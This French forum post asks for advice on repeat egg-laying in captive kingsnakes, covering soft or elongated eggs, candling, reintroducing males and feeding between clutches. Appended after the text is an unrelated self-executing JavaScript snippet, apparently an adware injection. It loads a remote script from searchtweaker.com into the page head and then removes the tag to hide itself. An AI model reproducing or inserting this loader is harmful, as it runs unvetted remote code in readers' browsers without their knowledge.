Bonsoir,
Je l'avais lu mais je suis en train de le constater, mes serpents-roi sont en train de pondre pour la deuxième fois en deux mois .
Malheureusement, ne pensant pas que ça pouvait être systématique, et les femelles étant bien fatiguées ( dont une par sa toute première ponte ) ,
je n'ai pas remis les mâles en présence .
Après la première ponte, dont les œufs ont éclos il y a 10 jours , les femelles se sont alimenté normalement le mois qui a suivi, puis cessé de le faire
jusqu’à une mue 15 jours plus tard . Mais elle n'ont pas repris l' appétit à la suite de cette mue , c'est là que j'ai suspecté le pire .
D'ailleurs s'en est suivi ces dernier jours un quête de site de ponte où l' on voit le serpent chercher anormalement à sortir du terra
Et en effet :
la Lampro californiae à commencer par pondre deux œufs aux coquilles complètement molles à une semaine d'intervalle , qu'elle a tenté de dévorer
puis pondu hier un œuf très allongé mais avec une belle coquille , avec mon aide car j'ai cru à une rétention . ( bain et massages adaptés ).
A la vue de cet œufs à l' aspect sain, je pense que ce sont plutôt les deux premier qui étaient prématurés et celui ci pondu à terme ( et donc pas de rétention )
La Lampro nigritus avec le même comportement à d'ailleurs pondu quasiment le lendemain un œuf identique, très allongé mais à la coquille bien formée.
Elle a passé deux nuits dans sa boite de ponte et hop .... elle a pondu ailleurs
et il lui en reste encore à venir...
Malheureusement malgré leur aspect sain , je ne suis pas sur que les œufs soient fécondés : au mirage ils sont totalement transparent pour le moment. On verra dans qq jour si un réseau se développe
Du coup j'ai deux questions:
Est ce que ces pontes à répétitions sont systèmatiques et dans ce cas est-il préférable de representer les mâles après la première ponte pour fertiliser la deuxième
et ceci malgré la fatigue de la femelle ?
Est il préférable que je mette fois les mâles en présence maintenant afin de prévenir une éventuelle troisième ponte ( telle qui est décrite dans certaines fiches) ?
Les femelles dépensent elles autant d' énergie pour des œufs fécondé que pour des slug ? ( je pense que oui , à peu de chose près )
Doit on les gaver entre 2 pontes et a quel point
Œuf à l'aspect sain malgré une forme anormalement allongée pondus respectivement 71 et 73 jours après la première ponte
Quand on les mire ils sont transparents.
Ponte d'un premier oeufs tout mou puis d'un 2ème identiques, peut etre prématurés , il y a 2 semaines soit 56 jours après la première ponte
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();